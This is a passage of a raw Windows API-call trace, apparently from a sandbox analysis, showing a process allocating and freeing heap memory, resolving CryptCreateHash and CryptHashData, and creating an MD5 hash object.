(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0243.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0243.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0243.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.315] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.330] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0243.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0243.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0243.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0243.335] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0243.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0243.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.337] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0243.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51190 [0243.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51190, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0243.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.340] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0243.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.340] RtlAllocateHeap 